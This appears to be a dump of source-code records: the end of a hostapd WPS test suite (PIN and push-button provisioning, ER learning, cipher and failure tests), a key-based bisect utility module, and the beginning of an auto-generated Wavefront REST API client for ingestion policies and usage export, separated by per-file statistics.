"model_name": "WAP", "model_number": "123",
"serial_number": "12345", "device_type": "6-0050F204-1",
"os_version": "01020300",
"config_methods": "label push_button",
"ap_pin": ap_pin, "uuid": ap_uuid, "upnp_iface": "lo"}
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
id = dev[0].connect(ssid, psk="12345678", scan_freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_ER_START ifname=lo")
ev = dev[0].wait_event(["WPS-ER-AP-ADD"], timeout=15)
if ev is None:
raise Exception("AP discovery timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not found")
dev[0].request("WPS_ER_LEARN " + ap_uuid + " " + ap_pin)
ev = dev[0].wait_event(["WPS-ER-AP-SETTINGS"], timeout=15)
if ev is None:
raise Exception("AP learn timed out")
if ap_uuid not in ev:
raise Exception("Expected AP UUID not in settings")
ev = dev[0].wait_event(["WPS-FAIL"], timeout=15)
if ev is None:
raise Exception("WPS-FAIL after AP learn timed out")
time.sleep(0.1)
pin = dev[1].wps_read_pin()
addr1 = dev[1].own_addr()
dev[0].dump_monitor()
dev[0].request("WPS_ER_PIN any " + pin)
time.sleep(0.1)
dev[1].scan_for_bss(bssid, freq=2412)
dev[1].request("WPS_PIN any %s" % pin)
ev = dev[1].wait_event(["WPS-SUCCESS"], timeout=30)
if ev is None:
raise Exception("Enrollee did not report success")
dev[1].wait_connected(timeout=15)
ev = dev[0].wait_event(["WPS-SUCCESS"], timeout=15)
if ev is None:
raise Exception("WPS ER did not report success")
def test_ap_wps_ignore_broadcast_ssid(dev, apdev):
"""WPS AP trying to ignore broadcast SSID"""
ssid = "test-wps"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1",
"ignore_broadcast_ssid": "1" })
if "FAIL" not in hapd.request("WPS_PBC"):
raise Exception("WPS unexpectedly enabled")
def test_ap_wps_wep(dev, apdev):
"""WPS AP trying to enable WEP"""
ssid = "test-wps"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1",
"ieee80211n": "0", "wep_key0": '"hello"' })
if "FAIL" not in hapd.request("WPS_PBC"):
raise Exception("WPS unexpectedly enabled")
def test_ap_wps_tkip(dev, apdev):
"""WPS AP trying to enable TKIP"""
ssid = "test-wps"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "1",
"ieee80211n": "0", "wpa": '1',
"wpa_key_mgmt": "WPA-PSK",
"wpa_passphrase": "12345678" })
if "FAIL" not in hapd.request("WPS_PBC"):
raise Exception("WPS unexpectedly enabled")
def test_ap_wps_conf_dummy_cred(dev, apdev):
"""WPS PIN provisioning with configured AP using dummy cred"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
hapd.request("WPS_PIN any 12345670")
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].dump_monitor()
try:
hapd.set("wps_testing_dummy_cred", "1")
dev[0].request("WPS_PIN " + apdev[0]['bssid'] + " 12345670")
for i in range(1, 3):
ev = dev[0].wait_event(["WPS-CRED-RECEIVED"], timeout=15)
if ev is None:
raise Exception("WPS credential %d not received" % i)
dev[0].wait_connected(timeout=30)
finally:
hapd.set("wps_testing_dummy_cred", "0")
def test_ap_wps_rf_bands(dev, apdev):
"""WPS and wps_rf_bands configuration"""
ssid = "test-wps-conf"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"wps_rf_bands": "ag" }
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
hapd.request("WPS_PBC")
dev[0].scan_for_bss(bssid, freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + bssid)
dev[0].wait_connected(timeout=30)
bss = dev[0].get_bss(bssid)
logger.info("BSS: " + str(bss))
if "103c000103" not in bss['ie']:
raise Exception("RF Bands attribute with expected values not found")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.set("wps_rf_bands", "ad")
hapd.set("wps_rf_bands", "a")
hapd.set("wps_rf_bands", "g")
hapd.set("wps_rf_bands", "b")
hapd.set("wps_rf_bands", "ga")
hapd.disable()
dev[0].dump_monitor()
dev[0].flush_scan_cache()
def test_ap_wps_pbc_in_m1(dev, apdev):
"""WPS and pbc_in_m1"""
ssid = "test-wps-conf"
params = { "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP",
"config_methods": "virtual_push_button virtual_display",
"pbc_in_m1": "1" }
hapd = hostapd.add_ap(apdev[0], params)
bssid = hapd.own_addr()
hapd.request("WPS_PBC")
dev[0].scan_for_bss(bssid, freq="2412")
dev[0].dump_monitor()
dev[0].request("WPS_PBC " + bssid)
dev[0].wait_connected(timeout=30)
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
hapd.disable()
dev[0].dump_monitor()
dev[0].flush_scan_cache()
def test_ap_wps_pin_start_failure(dev, apdev):
"""WPS_PIN start failure"""
with alloc_fail(dev[0], 1, "wpas_wps_start_dev_pw"):
if "FAIL" not in dev[0].request("WPS_PIN any 12345670"):
raise Exception("WPS_PIN not rejected during OOM")
with alloc_fail(dev[0], 1, "wpas_wps_start_dev_pw"):
if "FAIL" not in dev[0].request("WPS_PIN any"):
raise Exception("WPS_PIN not rejected during OOM")
def test_ap_wps_ap_pin_failure(dev, apdev):
"""WPS_AP_PIN failure"""
id = dev[0].add_network()
dev[0].set_network(id, "mode", "2")
dev[0].set_network_quoted(id, "ssid", "wpas-ap-wps")
dev[0].set_network_quoted(id, "psk", "1234567890")
dev[0].set_network(id, "frequency", "2412")
dev[0].set_network(id, "scan_freq", "2412")
dev[0].select_network(id)
dev[0].wait_connected()
with fail_test(dev[0], 1,
"os_get_random;wpa_supplicant_ctrl_iface_wps_ap_pin"):
if "FAIL" not in dev[0].request("WPS_AP_PIN random"):
raise Exception("WPS_AP_PIN random accepted")
with alloc_fail(dev[0], 1, "wpas_wps_ap_pin_set"):
if "FAIL" not in dev[0].request("WPS_AP_PIN set 12345670"):
raise Exception("WPS_AP_PIN set accepted")
dev[0].request("DISCONNECT")
dev[0].wait_disconnected()
def test_ap_wps_random_uuid(dev, apdev, params):
"""WPS and random UUID on Enrollee"""
ssid = "test-wps-conf"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK", "rsn_pairwise": "CCMP"})
config = os.path.join(params['logdir'], 'ap_wps_random_uuid.conf')
with open(config, "w") as f:
f.write("auto_uuid=1\n")
wpas = WpaSupplicant(global_iface='/tmp/wpas-wlan5')
uuid = []
for i in range(3):
wpas.interface_add("wlan5", config=config)
wpas.scan_for_bss(apdev[0]['bssid'], freq="2412")
wpas.dump_monitor()
wpas.request("WPS_PBC " + apdev[0]['bssid'])
ev = hapd.wait_event(["WPS-ENROLLEE-SEEN"], timeout=10)
if ev is None:
raise Exception("Enrollee not seen")
uuid.append(ev.split(' ')[2])
wpas.request("WPS_CANCEL")
wpas.dump_monitor()
wpas.interface_remove("wlan5")
hapd.dump_monitor()
logger.info("Seen UUIDs: " + str(uuid))
if uuid[0] == uuid[1] or uuid[0] == uuid[2] or uuid[1] == uuid[2]:
raise Exception("Same UUID used multiple times")
def test_ap_wps_conf_pin_gcmp_128(dev, apdev):
"""WPS PIN provisioning with configured AP using GCMP-128"""
run_ap_wps_conf_pin_cipher(dev, apdev, "GCMP")
def test_ap_wps_conf_pin_gcmp_256(dev, apdev):
"""WPS PIN provisioning with configured AP using GCMP-256"""
run_ap_wps_conf_pin_cipher(dev, apdev, "GCMP-256")
def test_ap_wps_conf_pin_ccmp_256(dev, apdev):
"""WPS PIN provisioning with configured AP using CCMP-256"""
run_ap_wps_conf_pin_cipher(dev, apdev, "CCMP-256")
def run_ap_wps_conf_pin_cipher(dev, apdev, cipher):
if cipher not in dev[0].get_capability("pairwise"):
raise HwsimSkip("Cipher %s not supported" % cipher)
ssid = "test-wps-conf-pin"
hapd = hostapd.add_ap(apdev[0],
{ "ssid": ssid, "eap_server": "1", "wps_state": "2",
"wpa_passphrase": "12345678", "wpa": "2",
"wpa_key_mgmt": "WPA-PSK",
"rsn_pairwise": cipher })
logger.info("WPS provisioning step")
pin = dev[0].wps_read_pin()
hapd.request("WPS_PIN any " + pin)
dev[0].scan_for_bss(apdev[0]['bssid'], freq="2412")
dev[0].request("WPS_PIN %s %s" % (apdev[0]['bssid'], pin))
dev[0].wait_connected(timeout=15)
| 40.430716
| 754
| 0.631862
| 59,916
| 406,733
| 4.057397
| 0.025018
| 0.024434
| 0.014253
| 0.020732
| 0.862758
| 0.838069
| 0.814823
| 0.786634
| 0.756305
| 0.728588
| 0
| 0.049444
| 0.223491
| 406,733
| 10,059
| 755
| 40.434735
| 0.720279
| 0.039549
| 0
| 0.734183
| 0
| 0.019948
| 0.228484
| 0.033122
| 0
| 0
| 0.0027
| 0
| 0
| 1
| 0.044145
| false
| 0.017351
| 0.004249
| 0.000118
| 0.056657
| 0.000118
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c31640b5a83760a1729390ec4b56a8433add552
| 2,797
|
py
|
Python
|
src/utils/bisect.py
|
simonepri/varname-transformers
|
4c406ab5ae815dc065662af574cd2d1a521b974f
|
[
"MIT"
] | 10
|
2020-02-27T12:01:53.000Z
|
2020-04-11T09:26:39.000Z
|
src/utils/bisect.py
|
simonepri/varname-seq2seq
|
4c406ab5ae815dc065662af574cd2d1a521b974f
|
[
"MIT"
] | null | null | null |
src/utils/bisect.py
|
simonepri/varname-seq2seq
|
4c406ab5ae815dc065662af574cd2d1a521b974f
|
[
"MIT"
] | null | null | null |
from typing import * # pylint: disable=W0401,W0614
# pylint: disable=C0103
def bisect_right(
a: List[Any], x: Any, key: Callable[[Any], Any], lo: int = 0, hi: Optional[int] = None
) -> int:
"""Return the index where to insert item x in list a, assuming a is sorted.
The return value i is such that all e in a[:i] have e <= x, and all e in
a[i:] have e > x. So if x already appears in the list, a.insert(i, x) will
insert just after the rightmost x already there.
Optional args lo (default 0) and hi (default len(a)) bound the
slice of a to be searched.
"""
if lo < 0:
raise ValueError("lo must be non-negative")
if hi is None:
hi = len(a)
while lo < hi:
mid = (lo + hi) // 2
if x < key(a[mid]):
hi = mid
else:
lo = mid + 1
return lo
# pylint: disable=C0103
def bisect_left(
a: List[Any], x: Any, key: Callable[[Any], Any], lo: int = 0, hi: Optional[int] = None
) -> int:
"""Return the index where to insert item x in list a, assuming a is sorted.
The return value i is such that all e in a[:i] have e < x, and all e in
a[i:] have e >= x. So if x already appears in the list, a.insert(i, x) will
insert just before the leftmost x already there.
Optional args lo (default 0) and hi (default len(a)) bound the
slice of a to be searched.
"""
if lo < 0:
raise ValueError("lo must be non-negative")
if hi is None:
hi = len(a)
while lo < hi:
mid = (lo + hi) // 2
if key(a[mid]) < x:
lo = mid + 1
else:
hi = mid
return lo
# pylint: disable=C0103
def index_lt(
a: List[Any], x: Any, key: Callable[[Any], Any], lo: int = 0, hi: Optional[int] = None
) -> int:
"""Locate the index of the rightmost value less than x"""
i = bisect_left(a, x, key, lo, hi)
if i:
return i - 1
raise ValueError("no value less than x")
# pylint: disable=C0103
def index_le(
a: List[Any], x: Any, key: Callable[[Any], Any], lo: int = 0, hi: Optional[int] = None
) -> int:
"""Locate the index of the rightmost value less than or equal to x"""
i = bisect_right(a, x, key, lo, hi)
if i:
return i - 1
raise ValueError("no value less than or equal to x")
# pylint: disable=C0103
def index_gt(
a: List[Any], x: Any, key: Callable[[Any], Any], lo: int = 0, hi: Optional[int] = None
) -> int:
"""Locate the index of the leftmost value greater than x"""
i = bisect_right(a, x, key, lo, hi)
if i != len(a):
return i
raise ValueError("no value greater than x")
# pylint: disable=C0103
def index_ge(
a: List[Any], x: Any, key: Callable[[Any], Any], lo: int = 0, hi: Optional[int] = None
) -> int:
"""Locate the index of the leftmost item greater than or equal to x"""
i = bisect_left(a, x, key, lo, hi)
if i != len(a):
return i
raise ValueError("no value greater than or equal to x")
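# Minimal usage sketch (added example; the sample data and the score()
# accessor are illustrative, not part of the original module): exercises the
# key-based helpers on a list of (name, score) pairs kept sorted by score.
if __name__ == "__main__":
    pairs = [("a", 1), ("b", 3), ("c", 3), ("d", 7)]
    def score(p: Tuple[str, int]) -> int:
        return p[1]
    assert bisect_left(pairs, 3, score) == 1   # before the leftmost 3
    assert bisect_right(pairs, 3, score) == 3  # after the rightmost 3
    assert index_le(pairs, 3, score) == 2      # rightmost item with score <= 3
    assert index_gt(pairs, 3, score) == 3      # leftmost item with score > 3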
| 29.442105
| 80
| 0.576689
| 475
| 2,797
| 3.374737
| 0.172632
| 0.019963
| 0.067374
| 0.078603
| 0.898316
| 0.87461
| 0.838428
| 0.808484
| 0.808484
| 0.808484
| 0
| 0.02449
| 0.299249
| 2,797
| 94
| 81
| 29.755319
| 0.793367
| 0.397211
| 0
| 0.842105
| 0
| 0
| 0.028768
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.105263
| false
| 0
| 0.017544
| 0
| 0.22807
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
7c353f83cafcc1bc04b54e35fe94e1ce36881611
| 40,006
|
py
|
Python
|
wavefront_api_client/api/usage_api.py
|
httpsgithu/python-client
|
f85a530367cdabe458a11919ad35609b9bc0606b
|
[
"Apache-2.0"
] | null | null | null |
wavefront_api_client/api/usage_api.py
|
httpsgithu/python-client
|
f85a530367cdabe458a11919ad35609b9bc0606b
|
[
"Apache-2.0"
] | null | null | null |
wavefront_api_client/api/usage_api.py
|
httpsgithu/python-client
|
f85a530367cdabe458a11919ad35609b9bc0606b
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
"""
Wavefront REST API Documentation
<p>The Wavefront REST API enables you to interact with Wavefront servers using standard REST API tools. You can use the REST API to automate commonly executed operations such as automatically tagging sources.</p><p>When you make REST API calls outside the Wavefront REST API documentation you must add the header \"Authorization: Bearer <<API-TOKEN>>\" to your HTTP requests.</p> # noqa: E501
OpenAPI spec version: v2
Contact: chitimba@wavefront.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from wavefront_api_client.api_client import ApiClient
class UsageApi(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
Ref: https://github.com/swagger-api/swagger-codegen
"""
def __init__(self, api_client=None):
if api_client is None:
api_client = ApiClient()
self.api_client = api_client
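# Usage sketch (illustrative, not part of the generated file): each generated
# method is synchronous by default and returns the response model directly;
# passing async_req=True instead returns a thread whose get() yields the same
# value. The Configuration/api_key wiring below follows the usual
# swagger-codegen convention; the exact api_key header name is an assumption.
#
#   config = wavefront_api_client.Configuration()
#   config.api_key['X-AUTH-TOKEN'] = '<<API-TOKEN>>'
#   api = UsageApi(ApiClient(config))
#   policies = api.get_all_ingestion_policies(offset=0, limit=100)  # sync
#   thread = api.get_all_ingestion_policies(async_req=True)         # async
#   policies = thread.get()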
def add_accounts(self, id, **kwargs): # noqa: E501
"""Add accounts to ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_accounts(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of accounts to be added to ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_accounts_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.add_accounts_with_http_info(id, **kwargs) # noqa: E501
return data
def add_accounts_with_http_info(self, id, **kwargs): # noqa: E501
"""Add accounts to ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_accounts_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of accounts to be added to ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_accounts" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `add_accounts`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy/{id}/addAccounts', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_groups(self, id, **kwargs): # noqa: E501
"""Add groups to the ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_groups(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of groups to be added to the ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_groups_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.add_groups_with_http_info(id, **kwargs) # noqa: E501
return data
def add_groups_with_http_info(self, id, **kwargs): # noqa: E501
"""Add groups to the ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_groups_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:param list[str] body: List of groups to be added to the ingestion policy
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_groups" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `add_groups`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy/{id}/addGroups', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def create_ingestion_policy(self, **kwargs): # noqa: E501
"""Create a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_ingestion_policy(async_req=True)
>>> result = thread.get()
:param async_req bool
:param IngestionPolicy body: Example Body: <pre>{ \"name\": \"Ingestion policy name\", \"description\": \"Ingestion policy description\", \"scope\": \"GROUP\", \"isLimited\": \"true\", \"limitPPS\": \"1000\" }</pre>
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.create_ingestion_policy_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.create_ingestion_policy_with_http_info(**kwargs) # noqa: E501
return data
def create_ingestion_policy_with_http_info(self, **kwargs): # noqa: E501
"""Create a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.create_ingestion_policy_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param IngestionPolicy body: Example Body: <pre>{ \"name\": \"Ingestion policy name\", \"description\": \"Ingestion policy description\", \"scope\": \"GROUP\", \"isLimited\": \"true\", \"limitPPS\": \"1000\" }</pre>
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method create_ingestion_policy" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def delete_ingestion_policy(self, id, **kwargs): # noqa: E501
"""Delete a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_ingestion_policy(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.delete_ingestion_policy_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.delete_ingestion_policy_with_http_info(id, **kwargs) # noqa: E501
return data
def delete_ingestion_policy_with_http_info(self, id, **kwargs): # noqa: E501
"""Delete a specific ingestion policy # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.delete_ingestion_policy_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str id: (required)
:return: ResponseContainerIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method delete_ingestion_policy" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'id' is set
if self.api_client.client_side_validation and ('id' not in params or
params['id'] is None): # noqa: E501
raise ValueError("Missing the required parameter `id` when calling `delete_ingestion_policy`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in params:
path_params['id'] = params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/ingestionpolicy/{id}', 'DELETE',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='ResponseContainerIngestionPolicy', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def export_csv(self, start_time, **kwargs): # noqa: E501
"""Export a CSV report # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_csv(start_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int start_time: start time in epoch seconds (required)
:param int end_time: end time in epoch seconds, null to use now
:return: None
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.export_csv_with_http_info(start_time, **kwargs) # noqa: E501
else:
(data) = self.export_csv_with_http_info(start_time, **kwargs) # noqa: E501
return data
def export_csv_with_http_info(self, start_time, **kwargs): # noqa: E501
"""Export a CSV report # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.export_csv_with_http_info(start_time, async_req=True)
>>> result = thread.get()
:param async_req bool
:param int start_time: start time in epoch seconds (required)
:param int end_time: end time in epoch seconds, null to use now
:return: None
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['start_time', 'end_time'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method export_csv" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'start_time' is set
if self.api_client.client_side_validation and ('start_time' not in params or
params['start_time'] is None): # noqa: E501
raise ValueError("Missing the required parameter `start_time` when calling `export_csv`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'start_time' in params:
query_params.append(('startTime', params['start_time'])) # noqa: E501
if 'end_time' in params:
query_params.append(('endTime', params['end_time'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/csv']) # noqa: E501
# Authentication setting
auth_settings = ['api_key'] # noqa: E501
return self.api_client.call_api(
'/api/v2/usage/exportcsv', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type=None, # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
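# --- Hedged usage note (illustrative; not part of the generated client) ---
# export_csv performs no deserialization (response_type=None above). To keep
# the raw CSV bytes, a sketch under the assumption that the client uses the
# usual swagger-codegen urllib3 REST backend:
#
#     raw = api.export_csv(start_time, _preload_content=False)
#     csv_bytes = raw.data  # .data is an assumption about the REST backend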
def get_all_ingestion_policies(self, **kwargs): # noqa: E501
"""Get all ingestion policies for a customer # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_ingestion_policies(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_all_ingestion_policies_with_http_info(**kwargs) # noqa: E501
else:
data = self.get_all_ingestion_policies_with_http_info(**kwargs)  # noqa: E501
return data
def get_all_ingestion_policies_with_http_info(self, **kwargs): # noqa: E501
"""Get all ingestion policies for a customer # noqa: E501
# noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_all_ingestion_policies_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param int offset:
:param int limit:
:return: ResponseContainerPagedIngestionPolicy
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['offset', 'limit'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method get_all_ingestion_policies" % key
)
params[key] = val
del params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'offset' in params:
